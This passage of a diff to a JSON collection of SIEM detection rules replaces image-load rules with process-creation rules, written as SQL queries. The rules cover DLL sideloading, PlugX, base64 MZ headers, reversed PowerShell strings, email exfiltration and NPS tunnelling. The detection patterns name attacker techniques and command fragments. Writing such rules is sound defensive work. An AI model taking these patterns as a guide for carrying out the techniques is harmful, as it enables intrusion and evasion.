'%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 